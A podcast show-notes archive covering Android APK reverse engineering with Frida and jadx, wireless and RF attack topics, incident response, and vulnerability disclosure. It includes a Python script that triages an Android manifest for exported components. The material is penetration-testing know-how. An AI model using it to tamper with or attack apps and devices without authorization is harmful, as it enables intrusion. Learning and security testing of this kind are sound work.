Frida • A world-class dynamic instrumentation framework | Inject JavaScript to explore native apps on Windows, macOS, GNU/Linux, iOS, Android, and QNX (Frida can be used with JavaScript, and Python, along with other languages)
GitHub - dweinstein/awesome-frida: Awesome Frida - A curated list of Frida resources http://www.frida.re/ (https://github.com/frida/frida)
Android APK crackme: owasp-mstg/0x05c-Reverse-Engineering-and-Tampering.md at master · OWASP/owasp-mstg · GitHub
Reverse-Engineering - YobiWiki
IntroAndroidSecurity download | SourceForge.net ←- link to my virtual machine and Androidx86 emulator
Background:
**consider this a primer for any class you might teach, a teaser, if you will**
Why do we want to be able to reverse engineer APKs and IPKs?
Android APKs (Android Packages) hold the source code to the application. If you can reverse this you will essentially have the keys to the kingdom. Developers and companies (if they’re proprietary) will add obfuscation - a technique to make the code unreadable to thwart reverse engineers from finding out their code.
What are some of the structures and files contained in APKs that are useful for ppl analyzing binaries?
Android applications have to have a MainActivity (written in Java). This activity is the entry point to the application.
Android applications also have an AndroidManifest.xml file which is the skeleton of the application. This describes the main activity, intents, service providers, permissions, and what Android operating system can run the application.
When testing apps for security, how easy is it to emulate security and physical controls if you’re not on a handset?
Pretty easy. You can use an emulator. I must forewarn though - you will need A LOT of memory for it to work effectively.
Are there ever any times you HAVE to use a handset? An app that tests something like Android’s Safetynet and won’t run without it? Do they ever want perf testing on their apps?
Was thinking about how you check events in logs, battery drain, using apps on older Android/iOS versions?
When organizations or developers ask you to test an app, is there anything in particular in scope? Out of scope?
How do progressive web apps differ from a more traditional app?
Lab setup
IntroToAndroidSecurity VM
Android Emulator
Tools to use
Why use them? (free, full-featured)
Setup and installation
OS-specific tools?
Tools used - Frida, Jadx-GUI (or command line), text editor. All of these items are free.
No setup required if using my virtual machine :-)
These apps are OS-specific if you choose Linux or Windows.
Callbacks
Methodology
Decompile the application - can use a tool titled - Apktool (free)
Look “under the hood” of the application - Jadx-GUI (Graphical User Interface) or Jadx-CLI (command line)
Connect your emulator/device using Android Debug Bridge (adb)
Get version of Frida on device
Look online to find correct version of Frida **this is important**
Start to play around with the tool and see if you receive error messages/prompts. Can then go back to code that was reverse engineered and see where it’s located.
Best practices
Leave no stones unturned! Meaning you might see something that seems too rudimentary to work - and yet it does.
Cert pinning -
Typical issues seen
Hard-coded passwords, data that is not being encrypted at rest or in transit.
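The "look under the hood" step above starts with AndroidManifest.xml, which the show notes describe as the skeleton of the app (entry activity, intents, providers, permissions, supported OS versions). The script below is an added example for these notes, not the guest's or the podcast's code: it reads an apktool-decoded manifest and pulls out what a tester checks first, namely which components are reachable from other apps, the launcher activity, requested permissions, and the debuggable/allowBackup/cleartext flags that feed the "typical issues" list. The manifest it parses is constructed for illustration (package com.example.notes and every component in it are made up), and because apktool moves <uses-sdk> into apktool.yml, the target SDK is passed in explicitly.

```python
"""Triage an apktool-decoded AndroidManifest.xml for exported attack surface.

Added example for these show notes; assumes you already ran `apktool d app.apk`.
The sample manifest below is constructed, not taken from any real app.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")

# Constructed sample in the form apktool emits (hypothetical app and components).
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <application android:debuggable="true" android:allowBackup="true">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".DeepLinkActivity">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <data android:scheme="notes"/>
      </intent-filter>
    </activity>
    <activity android:name=".SettingsActivity" android:exported="false"/>
    <service android:name=".SyncService" android:exported="true" android:permission="com.example.notes.SYNC"/>
    <receiver android:name=".BootReceiver" android:exported="false">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
    <provider android:name=".NotesProvider" android:authorities="com.example.notes.provider"/>
  </application>
</manifest>
"""


def android_attr(elem, name, default=None):
    """Read an android:-namespaced attribute (ElementTree needs the full URI)."""
    return elem.get("{%s}%s" % (ANDROID_NS, name), default)


def qualify(package, name):
    """A leading dot in android:name means 'relative to the package'."""
    return package + name if name.startswith(".") else name


def is_exported(component, target_sdk):
    """Android's default-export rule: an explicit android:exported wins;
    otherwise activities/services/receivers are exported iff they declare an
    <intent-filter>, and providers are exported by default only below API 17."""
    explicit = android_attr(component, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if component.tag == "provider":
        return target_sdk < 17
    return component.find("intent-filter") is not None


def triage_manifest(xml_text, target_sdk=None):
    """Return the facts a reviewer checks first. target_sdk usually has to
    come from apktool.yml, since apktool strips <uses-sdk> from the manifest."""
    root = ET.fromstring(xml_text)
    package = root.get("package")
    app = root.find("application")
    if target_sdk is None:
        sdk = root.find("uses-sdk")
        target_sdk = int(android_attr(sdk, "targetSdkVersion", "1")) if sdk is not None else 1
    report = {
        "package": package,
        "target_sdk": target_sdk,
        "permissions": sorted(android_attr(p, "name") for p in root.findall("uses-permission")),
        # Platform defaults: allowBackup is on unless disabled; cleartext HTTP is
        # allowed by default only when targeting API 27 or lower.
        "debuggable": android_attr(app, "debuggable", "false").lower() == "true",
        "allow_backup": android_attr(app, "allowBackup", "true").lower() == "true",
        "cleartext_traffic": android_attr(app, "usesCleartextTraffic",
                                          str(target_sdk < 28).lower()).lower() == "true",
        "main_activity": None,
        "exported": [],  # (tag, fully qualified name, guarding permission or None)
    }
    for comp in app:
        if comp.tag not in COMPONENT_TAGS:
            continue
        name = qualify(package, android_attr(comp, "name"))
        if is_exported(comp, target_sdk):
            # An exported component behind a custom permission is a different risk
            # from one that any app on the device can start or query.
            report["exported"].append((comp.tag, name, android_attr(comp, "permission")))
        for filt in comp.findall("intent-filter"):
            actions = {android_attr(a, "name") for a in filt.findall("action")}
            categories = {android_attr(c, "name") for c in filt.findall("category")}
            if "android.intent.action.MAIN" in actions and "android.intent.category.LAUNCHER" in categories:
                report["main_activity"] = name
    return report


if __name__ == "__main__":
    r = triage_manifest(SAMPLE_MANIFEST, target_sdk=28)
    print("package:", r["package"], "| launcher:", r["main_activity"])
    for tag, name, perm in r["exported"]:
        print("exported %-8s %s%s" % (tag, name, " (permission: %s)" % perm if perm else ""))
    for flag in ("debuggable", "allow_backup", "cleartext_traffic"):
        print("%s=%s" % (flag, r[flag]))
```

Run it against `<decoded-dir>/AndroidManifest.xml` with the targetSdkVersion from apktool.yml; the exported list is the set of entry points worth feeding into jadx first, and the three flags are quick wins to report before any dynamic testing with Frida.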
Published on: March 7, 2021
@thefluffy007
Published on: March 2, 2021
Links to discussed items:
Yandex Employee Caught Selling Access to Users' Email Inboxes (thehackernews.com)
Supply-Chain Hack Breaches 35 Companies, Including PayPal, Microsoft, Apple | Threatpost
Google pitches security standards for 'critical' open-source projects | SC Media (scmagazine.com)
https://www.kitploit.com/2021/02/damn-vulnerable-graphql-application.html
https://www.blumira.com/careers/?gh_jid=4000142004 sec evangelist @blumira
Published on: February 21, 2021
Ronnie Watson (@secopsgeek)
Youtube: watson infosec - YouTube
watsoninfosec (Watsoninfosec) · GitHub
Feel free to add anything you like
Wazuh - fork of OSSEC (Migrating from OSSEC · Wazuh · The Open Source Security Platform)
Implementing a Network Security Metrics Programs (giac.org)
What to track.
Some suggested metrics to start with:
6 Essential Security Features for Network Monitoring Solutions (solutionsreview.com)
Metrics of Security (nist.gov)
Security metrics are essential to comprehensive network security and CSA management. Without good metrics, analysts cannot answer many security related questions. Some examples of such questions include “Is our network more secure today than it was before?” or “Have the changes of network configurations improved our security posture?”
The ultimate aim of security metrics is to ensure business continuity (or mission success) and minimize business damage by preventing or minimizing the potential impact of cyber incidents.
DNS over HTTPS: DNS over HTTPS - Wikipedia
Published on: February 14, 2021
Ronnie Watson (@secopsgeek)
Published on: February 9, 2021
Discussion on mergers and acquisitions processes
On being acquired, but also if you’re acquiring a company
Best Practices
Best Practices of Mergers and Acquisitions (workforce.com)
The Role of Information Security in a Merger/Acquisition (bankinfosecurity.com)
Security Considerations in the Merger/Acquisition Process (sans.org)
The 10 steps to successful M&A integration | Bain & Company
Savvy Hackers Use Spearphishing to steal Wall Street M&A info (knowbe4.com)
“We’ve been acquired by X!”
First thing people think “oh no, what’s gonna happen to me.”
Published on: February 3, 2021
Discussion on Mergers and acquisitions processes
On being acquired, but also if you’re acquiring a company
Best Practices
Best Practices of Mergers and Acquisitions (workforce.com)
The Role of Information Security in a Merger/Acquisition (bankinfosecurity.com)
Security Considerations in the Merger/Acquisition Process (sans.org)
Women Unite Over CTF 3.0 (ittakesahuman.com)
The 10 steps to successful M&A integration | Bain & Company
Savvy Hackers Use Spearphishing to steal Wall Street M&A info (knowbe4.com)
“We’ve been acquired by X!”
First thing people think “what’s gonna happen to me.”
Published on: January 26, 2021
Secure RPC issue -
Elastic Search
https://anonymoushash.vmbrasseur.com/2021/01/14/elasticsearch-and-kibana-are-now-business-risks
“There are those who will point to the FAQ for the SSPL and claim that the license isn’t interpreted in that way because the FAQ says so. Unfortunately, when you agree to a license you are agreeing to the text of that license document and not to a FAQ. If the text of that license document is ambiguous, then so are your rights and responsibilities under that license. Should your compliance to that license come before a judge, it’s their interpretation of those rights and responsibilities that will hold sway. This ambiguity puts your organisation at risk.”
Doubling down on open, Part II | Elastic Blog - license change affecting Elastic Search and Kibana
MongoDB did something similar in 2018: mjg59 | Initial thoughts on MongoDB's new Server Side Public License (dreamwidth.org)
Hacker News Discussion: MongoDB switches up its open source license | Hacker News (ycombinator.com)
[License-review] Approval: Server Side Public License, Version 2 (SSPL v2) (opensource.org)
“We continue to believe that the SSPL complies with the Open Source
Definition and the four essential software freedoms. However, based on its
reception by the members of this list and the greater open source
community, the community consensus required to support OSI approval does
not currently appear to exist regarding the copyleft provision of SSPL.
Thus, in order to be respectful of the time and efforts of the OSI board
and this list’s members, we are hereby withdrawing the SSPL from OSI
consideration.”
(could be ‘open source’, but negative feedback on the mailing lists and elsewhere made them withdraw it from OSI consideration)
Open Source license requirements: The Open Source Definition | Open Source Initiative
What does this mean?
If you have products that utilize Elasticsearch/MongoDB/Kibana in some way, talk to your legal teams to find out if you need to divest your org from them. These are not ‘open source’ licenses; they are ‘source available’.
It might not affect your organization and moving to SSPL might be feasible. If your product makes any changes internally to ElasticSearch,
Notable links
JTNYDV - specifically the CIS docker hardening
Twitter: @jtnydv
https://www.coindesk.com/anchorage-becomes-first-occ-approved-national-crypto-bank
https://www.cnn.com/2021/01/15/uk/bitcoin-trash-landfill-gbr-scli-intl/index.html
Published on: January 19, 2021
Dream Doxxed:
Minecraft YouTuber Dream Doxxed Following Speedrun Controversy (screenrant.com)
OSINT issues: found him by following breadcrumbs and using Zillow interior photos of his house. Craziness.
How to Use APIs (explained from scratch) (secjuice.com)
Hackers target cryptocurrency users with new ElectroRAT malware | ZDNet
Cobalt Strike and Metasploit accounted for a quarter of all malware C&C servers in 2020 | ZDNet
Published on: January 12, 2021
End of year podcast
Blumira sponsorship
NEWS:
IT company SolarWinds says it may have been hit in 'highly sophisticated' hack | Reuters
FireEye hacked: US cybersecurity firm FireEye hit by 'state-sponsored' attack - BBC News
https://krypt3ia.wordpress.com/ - 16 december 2020
Microsoft flexing muscle to shutdown c2: Microsoft unleashes ‘Death Star’ on SolarWinds hackers in extraordinary response to breach - GeekWire
Little-known SolarWinds gets scrutiny over hack, stock sales (apnews.com)
FireEye, GoDaddy,and Microsoft create kill switch for SolarWinds backdoorSecurity Affairs
US Gov hacked: US government agencies hacked; Russia a possible culprit (apnews.com)
Not mentioned during the podcast: Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor | FireEye Inc
Not trying to spread FUD, but would infiltration by using FOSS tools be easier than Solarwinds?
Time to remove Nano Adblocker and Defender from your browsers (except Firefox) - gHacks Tech News
System oriented programming - Cloud-Sliver (cloud-sliver.com)
G’bye Flash… Adobe releases final Flash Player update, warns of 2021 kill switch (bleepingcomputer.com)
IT workers worried about AI making them obsolete… IT Workers Fear Becoming Obsolete in Cyber Roles - Infosecurity Magazine (infosecurity-magazine.com)
Qbot malware switched to stealthy new Windows autostart method (bleepingcomputer.com)
https://www.atlasobscura.com/places/encryption-lava-lamps - “The randomness of this wall of lava lamps helps encrypt up to 10 percent of the internet. “
It’s been the year of the business continuity program this year… and how agile yours is.
--thoughts?
Future?
Bryan: Companies that are ‘all in’ on remote work will back track.
Amanda: I think we’ll see way more keep the wfh now that they realize it saves $$
Published on: December 17, 2020
BrakeSec Sponsored Interview with Nathanael Iversen
Questions, comments, and other content goes here:
Illumio Nathanael Iversen BDS Podcast Messaging
Topic: Overview of development and deployment of micro-segmentation
Where does segmentation fit into your security strategy?
The keys to a successful micro-segmentation deployment: As with any security control, it’s important to balance the strategy of the business with the need to secure it. There are several key functions and abilities to consider to ensure your deployment goes smoothly:
There are three broad preventive security actions:
Potential questions:
https://www.hak4kidz.com/activities/cdcedu.html
Online CTF training using Cisco’s Workshop platform. They did something similar in Spring of 2020.
There will be an online panel where kids can ask questions about information security.
Occurs on December 12th. Check out the link for more info.
Robert M. for upping his patreon to $5
Top 25 Data Security Podcasts You Must Follow in 2020 (feedspot.com)
@byt3bl33d3r (Marcello Salvati)
@porchetta_ind (porchetta Industries)
Wanna sponsor CrackMapExec? Sponsor @byt3bl33d3r on GitHub Sponsors
Github sponsors: GitHub Sponsors
How is this different than shareware?
“As a developer of one of these tools, you obviously start questioning your life decisions after a while. Especially after putting so much time into these projects.”
Adblockers installed 300,000 times are malicious and should be removed now | Ars Technica
(spent years supporting the app… the vitriol from ‘unpaid customers’ is deafening… Should be required reading for anyone wanting to open source anything.) [Announcement] Recent and upcoming changes to the Nano projects · Issue #362 · NanoAdblocker/NanoCore (github.com)
Business model for typical open-source projects. Where is the chain broken?
Devs who expect help/support for their project?
“Many eyes make for less vulns” (LOL, sounds good, not true anymore --brbr)
What is the ‘status quo’ of OSS infosec/hacking tool developer community (in your opinion)?
Pull requests: what are ‘meaningful’ contributions?
What is the definition of ‘widely-used’? Why support widely-used OSS hacking tools?
And now for something completely different... (porchetta.industries)
Published on: December 7, 2020
Published on: December 2, 2020
Sébastien Dudek -
@penthertz
Why are we here today?
Software Defined Radio (sdr-radio.com)
What kind of hardware or software do you need? Why would a security professional want to know how to use SDR tools and attacks?
What other kinds of attacks can be launched? (I mean, other than replay type attacks)
Door systems (badge systems)
NFC? Contactless credit card attacks
Smart building/home control systems
Bluetooth attacks
Point Of Sale systems
Cellular radio 3g/4g/5g
Industrial control systems
Home appliances
Medical telemetry systems
Drones!
DASH7 - Wikipedia - custom TCP stack for LoRa
Vehicle-to-grid - Wikipedia (V2G)
Automatic Wireless Protocol Reverse Engineering | USENIX
Hunting mobile devices endpoints - the RF and the Hard way | Synacktiv - Sébastien Dudek
Carrier Aggregation explained (3gpp.org)
Mobile phone jammer - Wikipedia
World’s top hackers meet at the first 5G Cyber Security Hackathon - Security Boulevard
Supply chain attacks - systems tend to use wireless chipsets or protocols
LTE-torpedo-NDSS19.pdf (uiowa.edu) -privacy attacks on 4g/5g networks using side channel information
How does someone make a Faraday cage on the cheap? (mentioned in one of your class agendas)
Lots of IoT devices use your typical home wifi connection, can’t you just sniff packets to get what you need?
Replay attacks on car fobs: Jam and Replay Attacks on Vehicular Keyless Entry Systems (s34s0n.github.io)
Attacks on Tesla wireless entry: Tesla’s keyless entry vulnerable to spoofing attack, researchers find - The Verge
Garage door opener attacks: How to Hack a Garage Door in Under 10 Seconds and What You Can Do About It - ITS Tactical
Kid’s toy opens garage doors: This Hacked Kids' Toy Opens Garage Doors in Seconds | WIRED
What are the current limitations to testing wireless and RF related systems? What about custom wireless implementations?
Cellular?
Zigbee?
I’m a wireless manufacturer of some kind of device. I’m freaked now by hearing you talk about how easy it is to attack wireless systems. What are some things I could do to ensure that the types of attacks we discussed here cannot affect me?
Wireless defense system? https://www.researchgate.net/publication/321491751_Security_Mechanisms_to_Defend_against_New_Attacks_on_Software-Defined_Radio
List of SDR software: The BIG List of RTL-SDR Supported Software (rtl-sdr.com)
Published on: November 24, 2020
**Apologies on the Zoom issues**
This is the 2nd of 3 sponsored podcast interviews with Illumio about their zero trust product.
Katey Wood is the Director of Product Marketing at Illumio.
https://www.linkedin.com/in/kateywood/
Topic: Conversation on segmentation and ransomware
Topic Background:
The attack surface and vulnerabilities are on the rise, along with cyber attacks
Why? Remote everything - cloud collaboration (including processing PII) is the new normal and that means the attack surface is heightened. This requires appropriate network, cloud, and endpoint security.
Double ransom with #data #exfiltration -- more attackers are exfiltrating customer data from businesses and (if ransom is withheld) extorting consumers directly through bitcoin - often in the headlines.
Privacy is a chief security concern now more than ever before, as remote everything continues and #cyberattacks and #ransomware attacks skyrocket.
For businesses, Covid and the new WFH normal means even more vulnerabilities and greater incentive to pay an even higher ransom to avoid privacy law penalties and class-action litigation.
Enter Segmentation.
Perimeter security is important, but unfortunately, we all know that alone it’s not enough (i.e. breach, after breach, after high-profile breach).
#ZeroTrust the assume breach mentality/default deny are philosophies that take security deeper to protect organizations from a threat moving laterally within their environment. This is helpful because it’s often not the initial point of breach that causes so much damage – it’s the breach spreading to more critical data and assets that’s so destructive.
#Network #segmentation is a crucial control to secure critical data and PII, by ring-fencing applications with patient or client data. Implementing Zero Trust security policies limits access to only allowed parties with a legitimate business purpose and stops the attacker from moving freely across the network to the most valuable data.
#Illumio helps #healthcare, academic, and other critical industries keep their crown jewels safe through better, more scalable micro-segmentation that decouples Zero Trust from the constraints of the network by implementing it on the workload.
Vertical ‘Brakedown’ - Healthcare and Education
Businesses in the healthcare and education industries, which often have large numbers of customers and employees and handle large volumes of PII, are especially at risk.
Both have already been under scrutiny for privacy concerns around PII for years, through regulations like #HIPAA in healthcare and #FERPA in education (and now #CCPA).
Now that distance learning is the norm and medical records have gone largely electronic, it’s even easier for attackers to move between systems if there are no network segmentation access policies in place to prevent it.
Potential Questions:
Customer data cases:
‘Dead data’
With today’s workforce largely remote, tell me what that means from a security standpoint. What challenges are businesses facing to protect important data/PII?
What is that data “worth” and what are the consequences of falling victim to a ransomware attack or similar event from a bad actor?
Talk to me about the “assume breach mentality.” What does that mean and how can you/why should you use this philosophy in your approach to security?
How does segmentation relate to compliance? How do the two go hand in hand?
How does segmentation protect organizations against large scale breaches?
In terms of cost, is segmentation a sizable investment for SMBs? Is it a worthwhile investment, in terms of dollars saved from ransomware attacks?
#Segmentation is often thought of as a big (perhaps cumbersome) project – how do you suggest organizations make it more scalable?
How does segmentation protect end users?
Published on: November 17, 2020
Phillip Wylie @philipwylie
and Kim Crawley @kim_crawley
Amazon: The Pentester BluePrint: Your Guide to Being a Pentester: 9781119684305: Computer Science Books @ AmazonSmile (November 24th for paper copy)
Steven Levy: Hackers: Heroes of the Computer Revolution: Steven Levy: 9781449388393: Amazon.com: Books
Why did you write the book?
What is a pentester?
Skills needed
Education of hacker
Building a lab
Kali linux
Pentester Framework
Docker
OWASP Juice Shop
Vulnhub
Overthewire
PicoCTF
Developing a plan
Gaining experience
Gaining employment
Hacking Is Not a Crime - hacktivist org? https://www.hackingisnotacrime.org/
Published on: November 15, 2020
“Between stimulus and response there is a space. In that space is our power to choose our response. In our response lies our growth and our freedom.” --Viktor Frankl
https://smile.amazon.com/Mans-Search-for-Meaning-audiobook/dp/B0006IU470
https://twitter.com/conordsherman
Conor Sherman - IR stories and more
Security Strategy and Incident Response, eZCater
Confident Defense Podcast - https://www.confidentdefense.com/podcast
https://www.linkedin.com/in/conordsherman/
Agenda:
Bio (How did I get here?)
Prior preparation and planning prevents poor performance - https://military.wikia.org/wiki/7_Ps_(military_adage)
Discover Unique malware
FIN 6 - https://www.zdnet.com/article/cybercrime-group-fin6-evolves-from-pos-malware-to-ransomware/
FIN 7 - https://threatpost.com/fin7-retools/149117/
CCPA - https://oag.ca.gov/privacy/ccpa
CIS 20 is ‘reasonable security program’ per California AG - https://www.prnewswire.com/news-releases/california-attorney-general-concludes-that-failing-to-implement-the-center-for-internet-securitys-cis-critical-security-controls-constitutes-a-lack-of-reasonable-security-300223659.html
IBM breach cost: “Cost Of A data Breach” (Search This)
Cloud Infra Compliance-
Governance as Code - https://www.cio.com/article/3277611/governance-as-code-keeping-pace-with-the-rate-of-change-in-the-cloud.html
“In the future, governance as code will be the backbone driving our IT systems and services. It will enable us to deliver consistent, efficient and highly repeating business outcomes at the lowest possible cost, with the maximum availability and security, while also allowing our people to expand into new and higher value-add roles across business.”
Detection as Code
“Freedom within Limits” - Security as Solutions Engineers
Sigma: https://github.com/Neo23x0/sigma
“Sigma is a generic and open signature format that allows you to describe relevant log events in a straightforward manner. The rule format is very flexible, easy to write and applicable to any type of log file.”
Japan CIRT event ID whitepaper: https://www.jpcert.or.jp/english/pub/sr/DetectingLateralMovementThroughTrackingEventLogs_version2.pdf
https://jpcertcc.github.io/ToolAnalysisResultSheet/
“Shield is an active defense knowledge base MITRE is developing to capture and organize what we are learning about active defense and adversary engagement. Derived from over 10 years of adversary engagement experience, it spans the range from high level, CISO ready considerations of opportunities and objectives, to practitioner friendly discussions of the TTPs available to defenders.”
IR Playbooks -
process of creating them (probably the hardest)
Implementation
Tabletop exercise (length, stakeholders, crafting a scenario to compare against)
What if an org has nothing? “We just blow up the environment and start over."
RTO/RPO metrics: How long can you survive as a company with an outage? How long does it take to get back online and operational? What’s your appetite for the risk of that?
Lots of dependencies when creating them
https://swimlane.com/blog/incident-response-playbook
Tabletop discussion -
sponsors involved
Initiating condition
Threat modeling
Process steps
Best practices and local policies
End state - what is the goal? (eradicate infection, back to operating status)
Relation to governance/regulatory reqs. (do we have to report? What do we report? Fallout from incident, etc)
Lessons Learned
https://sbscyber.com/resources/7-steps-to-building-an-incident-response-playbook (seems like there are different methodologies)
Why are the things that will give organizations the biggest benefit over time the cause of the most consternation?
Published on: November 10, 2020
Previous Election Security podcast: https://brakeingsecurity.com/2018-042-election-security-processes-in-the-state-of-ohio
Jeremy Mio (@cyborg00101)
https://itsecurity.cuyahogacounty.us/
(added cybersecurity Directives during 2018 last podcast -jmio)
Einstein (US-CERT program) - Wikipedia
Albert Program
(added new cybersecurity Directives since last podcast -jmio)
Vuln disclosure policy: Vulnerability Disclosure Policy - Ohio Secretary of State (ohiosos.gov)
Did anyone think to pentest the vuln acceptance form? (lol, layers in layers --brbr)
Ohio to ramp up election security with new federal funds | TheHill
“Ohio has taken steps to combat those types of threats. In October, Ohio Gov. Mike DeWine (R) signed into law a measure that required post-election audits to ensure the accuracy of the vote count, and created a “civilian cyber security reserve” to defend against potential cyberattacks.
“His [secretary of state LaRose] first-of-its-kind Vulnerability Disclosure Policy invites Ohio’s crop of “white-hat” hackers — the good guys, opposite malevolent “black-hat” hackers — to break into the state’s election system, find bugs and report them so officials can ensure they’re fixed by Election Day.
There are some strings attached: White hats aren’t allowed to phish for information or tamper with electronic county voter registration systems, and actual voting machines — legally barred from being connected to the internet — are off-limits. If they do find sensitive information, they’re expected to report it.”
How did the threat model shift from the last time we talked?
What has changed in terms of organization and threats? You mentioned 4-5 different voting regions last time, all with different levels of technology. Any updates on the tech?
How did covid change how voting occurred?
How have you leveraged the Elections Infrastructure ISAC (EI-ISAC) in passing along threats and sharing information?
Has insider threat been part of your threat model and what has your group done to minimize the chances? (why does it feel like the Oscars has more scrutiny in terms of voting security than the US democratic process? --brbr)
What does physical security look like in terms of people going to the polls? (wasn’t sure if that was something in your purview --brbr) (this is not (Election Board and Sheriff), but can discuss high level -jmio)
Using hardware domain block services? Malicious Domain Blocking and Reporting (MDBR) Newest Service for U.S. SLTTs (cisecurity.org)
LaRose Setting New Standard For Election Security - Ohio Secretary of State (ohiosos.gov)
88 election districts will have access to domain-blocking tech (mandated to start by 28 August 2020) and cybersecurity experts. Can you give us an update on any of what was mentioned in the press release?
Background checks
Published on: November 2, 2020
Phil Beyer -
Bio (CISO at Etsy)
Importance of books about behavioral science.
“Thinking Fast and Slow”:
https://smile.amazon.com/Thinking-Fast-Slow-Daniel-Kahneman/dp/0374533555
“Predictably irrational”: https://smile.amazon.com/Predictably-Irrational-Revised-Expanded-Decisions/dp/0061353248/
http://humanhow.com/list-of-cognitive-biases-with-examples/
Influence: the Psychology of Persuasion: https://smile.amazon.com/Influence-Psychology-Persuasion-Robert-Cialdini/dp/006124189X
Brain at Work: https://smile.amazon.com/Your-Brain-Work-Revised-Updated/dp/0063003155/
Atomic habits: https://smile.amazon.com/Atomic-Habits-Proven-Build-Break/dp/0735211299/
Tiny habits: https://smile.amazon.com/Tiny-Habits-Changes-Change-Everything/dp/0358003326/
New leaders 100 day action plan: https://smile.amazon.com/New-Leaders-100-Day-Action-Plan/dp/1119223237/
Podcasts:
Manager Tools Podcast: https://manager-tools.com
Career Tools Podcast: https://www.manager-tools.com/all-podcasts?field_content_domain_tid=5
Seth Godin Akimbo: https://www.akimbo.link/
Masters of scale: https://mastersofscale.com/
Habit stacking -
Temptation bundling -
Availability Heuristic: https://en.wikipedia.org/wiki/Availability_heuristic
Brian’s Recommendations:
Extraordinary Popular Delusions and the Madness of Crowds: https://www.amazon.com/Extraordinary-Popular-Delusions-Madness-Crowds/dp/1463740514
Big 9: https://www.amazon.com/Big-Nine-Thinking-Machines-Humanity/dp/154177373X
Bryan’s Book Recommendations:
Malcolm Gladwell’s Talking to Strangers:
https://smile.amazon.com/Talking-to-Strangers-audiobook/dp/B07NJCG1XS
The Effective Manager by Mark Horstman: https://smile.amazon.com/The-Effective-Manager-audiobook/dp/B071JSWHBJ
ADKAR: A Model for Change in Business, Government and our Community
https://smile.amazon.com/ADKAR-Change-Business-Government-Community/dp/1930885504
Improved interviews online
First 90 days as CISO
First 90 day plan: https://www.manager-tools.com/2012/06/90-day-new-job-plan-overview
Capability Assessment: https://www.strategyand.pwc.com/gx/en/unique-solutions/capabilities-driven-strategy/capabilities-assessment.html
Socratic method: https://en.wikipedia.org/wiki/Socratic_method
Impacts to make
Building rapport with new directs
Creating a new relationship ‘budget’ with manager/board, colleagues
Planning your strategy to make meaningful change in the org as a whole
Published on: October 28, 2020
http://brakeingsecurity.com/2020-023-jame-nelson-from-illumio-cyber-resilence-business-continuity
What is Zero Trust and why should companies adopt a Zero Trust philosophy?
Amanda: What are one of the more important steps someone should take when looking to implement zero trust?
How does segmentation fit in a Zero Trust model? What are some of the challenges and benefits that come with segmentation?
Are there real-world examples of how segmentation has stopped a breach and how that relates to the Zero Trust philosophy?
How can Zero Trust principles help prevent the spread of ransomware or another security epidemic?
Do you need 100% asset mgmt already before implementing or is that part of what you do as well?
Integrations: you mentioned auth functions, but how integrated can Illumio go with your env? EDR? NDR? (saw on your site, you’re fully integrated with Crowdstrike falcon)
Tell us more about the Forrester Wave? What do the findings mean and why do they matter?
https://www.illumio.com/resource-center/research-report/forrester-wave-zero-trust-2020
Twitter: https://twitter.com/illumio
LinkedIn: https://www.linkedin.com/company/illumio/mycompany/
Published on: October 23, 2020
Published on: October 20, 2020
Introduce Katie (bio) (@k8em0) CEO and Owner, LutaSecurity
The scope of the VCMM (what is it?)
VCMM - Vulnerability Coordination Maturity Model
https://www.lutasecurity.com/vcmm
Just covers the internal process? To ready an org for a bug bounty program or to accept vulns from security researchers?
You mentioned not playing whack-a-mole, when it comes to responding at the beginning of a vuln disclosure program. Is the directing of different categories of bugs one of the things that goes into not having to just wait for the bugs to roll in?
Will this work for internal security or red teams as well, or is this more suited to bug bounties?
What’s the timeline for this process? “We need something for a product launch next week…”
Stakeholders involved? CISO? Security team? IT? Devs?
What precipitates the need for this? Maturity? Vuln Disclosure?
Are the ISO docs required for this to work, or will they assist in an easier outcome?
https://blog.rapid7.com/2017/12/19/nist-cyber-framework-revised-to-include-coordinated-vuln-disclosure-processes/
10 worst jobs (popsci article): https://web.archive.org/web/20070712070214/https://www.popsci.com/popsci/science/0203101256a23110vgnvcm1000004eecbccdrcrd.html
How does an org use this to communicate vulnerabilities in their own products?
What’s the bare minimum you need on this chart for a successful program? Are any facets more important than the others? Does anyone hit all 3s, or is that a pipedream?
Incentive “no legal action will be taken”. People want money… not tours, not 10-point font. How do you convince ‘good’ bug writers to want to help you for a ‘thank you’? Should incentive be a ‘Level 3’ or would you consider it not ready for prime-time?
https://www.zdnet.com/article/yahoo-changes-bug-bounty-policy-following-t-shirt-gate/
Vuln reporting
Lots of Twitter fodder about companies that handle vuln disclosure poorly; some folks even say you shouldn’t bother and should just go through a 3rd party.
If a company is taking bugs and doing all the baseline items, what are some other things they could do to make security disclosure easier?
Security.txt?
Clearly stated bugs@ or Security@ (and not buried in 3 point font in the privacy policy, or ToS)
SLA to reply to all bugs?
Standardized disclosure form for discoveries?
Slide Presentation Overview: https://7bb97855-c50f-4dce-9a1c-325268684c64.filesusr.com/ugd/ed9b4b_f04d16446542494887906777a39204bf.pdf
ISO 29147:2018 - $150 USD
https://www.iso.org/standard/72311.html
ISO 30111:2019 - $95 USD
https://www.iso.org/standard/69725.html
ISO 27034-7:2018 - $150 USD
https://www.iso.org/standard/66229.html
Published on: October 11, 2020
Introduce Katie (bio) (@k8em0) CEO and Owner, Luta Security
Published on: October 6, 2020
FIND US NOW ON AMAZON MUSIC! https://music.amazon.com/podcasts/51b7da82-c223-4de4-8fc1-d1c3dd61984a/Brakeing-Down-Security-Podcast
Shout out to the organizers of BSides Edmonton, Alberta, Canada for a great conference!
Amanda’s social media take over this week
Bryan's plumbing story (A tale of 3 toilets)
https://www.infosecurity-magazine.com/news/corporate-data-on-personal-devices/
https://www.infosecurity-magazine.com/news/fatality-after-hospital-hacked/
